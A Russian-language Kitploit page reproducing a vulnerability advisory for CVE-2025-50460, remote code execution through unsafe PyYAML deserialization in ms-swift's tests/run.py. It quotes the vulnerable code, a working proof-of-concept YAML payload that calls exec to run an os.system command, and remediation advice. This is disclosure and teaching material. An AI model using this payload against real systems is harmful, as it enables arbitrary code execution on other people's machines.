Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-50460 — Технические детали и эксплойт для CVE-2025-50460 | Kitploit
Инструменты/GitHubGitHub/anchor0221/cve-2025-50460
Статический анализАнализ уязвимостейАнализ КодаЭксплуатацияСтатьи и ИсследованияОбучение и Образование
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Технические детали и эксплойт для CVE-2025-50460

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-50460: Удаленное выполнение кода в modelscope/ms-swift из-за небезопасной десериализации PyYAML

Статус: Ожидание анализа
Данная запись CVE отмечена для усиления NVD.

Уязвимость удаленного выполнения кода (RCE) существует в проекте ms-swift версии 3.3.0 из-за небезопасной десериализации в tests/run.py с использованием yaml.load() из библиотеки PyYAML (версии = 5.3.1). Если злоумышленник может контролировать содержимое YAML-файла конфигурации, переданного параметру --run_config, во время десериализации может быть выполнен произвольный код. Это может привести к полной компрометации системы. Уязвимость срабатывает при загрузке вредоносного YAML-файла, что позволяет выполнять произвольные команды Python, такие как os.system(). Рекомендуется обновить PyYAML до версии 5.4 или выше и использовать yaml.safe_load() для устранения проблемы.

Описание

Уязвимость удаленного выполнения кода (RCE) существует в проекте modelscope/ms-swift из-за небезопасного использования yaml.load() в сочетании с уязвимыми версиями библиотеки PyYAML (≤ 5.3.1). Проблема находится в скрипте tests/run.py, где предоставленный пользователем YAML-файл конфигурации десериализуется с помощью yaml.load() и yaml.FullLoader.

Если злоумышленник может контролировать или заменить YAML-файл конфигурации, передаваемый аргументу --run_config, он может внедрить вредоносную нагрузку, приводящую к выполнению произвольного кода.

Затронутый репозиторий

  • Проект: modelscope/ms-swift
  • Затронутые версии: последняя
  • Файл: tests/run.py
  • Постоянная ссылка GitHub: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Зависимость: PyYAML <= 5.3.1

Уязвимый код

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Подтверждение концепции (PoC)

Шаг 1: Создание вредоносного YAML-файла (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Шаг 2: Выполнение с уязвимой версией PyYAML (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Это приводит к выполнению os.system, что доказывает выполнение кода.

Устранение

  • Замените yaml.load() на yaml.safe_load()
  • Обновите PyYAML до версии 5.4 или новее

Пример исправления:

root@kitploit:~
# До
yaml.load(f, Loader=yaml.FullLoader)

# После
yaml.safe_load(f)

Статус CVE

ПолеЗначение
CVE IDCVE-2025-50460
CVSS ScoreTBD
CWECWE-502: Десериализация недоверенных данных
Дата отчета2025-04-25
Дата раскрытия2025-07-30
Затронутая версияпоследняя
Версия исправления

Авторы

  • Обнаружено: Юй Ронг (戎誉) и Хао Фань (凡浩)
  • Контакт: [[email protected] ]
Скачать инструмент